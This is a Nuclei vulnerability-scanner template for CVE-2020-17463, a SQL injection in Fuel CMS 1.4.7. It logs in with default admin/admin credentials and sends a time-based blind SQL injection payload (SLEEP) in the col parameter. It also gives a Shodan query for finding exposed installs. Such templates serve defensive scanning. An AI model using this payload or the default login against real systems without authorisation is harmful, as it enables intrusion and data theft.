nuclei-templates/http/cves/2020/CVE-2020-17463.yaml

66 lines
2.3 KiB
YAML

id: CVE-2020-17463
info:
name: Fuel CMS 1.4.7 - SQL Injection
author: Thirukrishnan
severity: critical
description: |
FUEL CMS 1.4.7 allows SQL Injection via the col parameter to /pages/items, /permissions/items, or /navigation/items.
impact: |
Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
remediation: Fixed in version 115
reference:
- https://www.exploit-db.com/exploits/48741
- https://nvd.nist.gov/vuln/detail/CVE-2020-17463
- http://packetstormsecurity.com/files/158840/Fuel-CMS-1.4.7-SQL-Injection.html
- https://getfuelcms.com/
- https://cwe.mitre.org/data/definitions/89.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-17463
cwe-id: CWE-89
epss-score: 0.94399
epss-percentile: 0.99154
cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.7:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: thedaylightstudio
product: fuel_cms
shodan-query: http.title:"fuel cms"
tags: cve,cve2020,packetstorm,sqli,fuel-cms,kev,thedaylightstudio
http:
- raw:
- |
GET /fuel/login/ HTTP/1.1
Host: {{Hostname}}
- |
POST /fuel/login/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}
user_name={{username}}&password={{password}}&Login=Login&forward=
- |
@timeout: 10s
GET /fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Referer: {{RootURL}}
payloads:
username:
- admin
password:
- admin
attack: pitchfork
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code_3 == 200'
- 'contains(body_1, "FUEL CMS")'
condition: and
# digest: 490a0046304402200a2e9d98f445334774bd7fe2ae6afd6669809096d55a82f9b6be1e9015a639f2022025f1354f6fd86600a6cc7c44e2401397db0d4619dc406e7213f617f08f281f9f:922c64590222798bb761d5b6d8e72950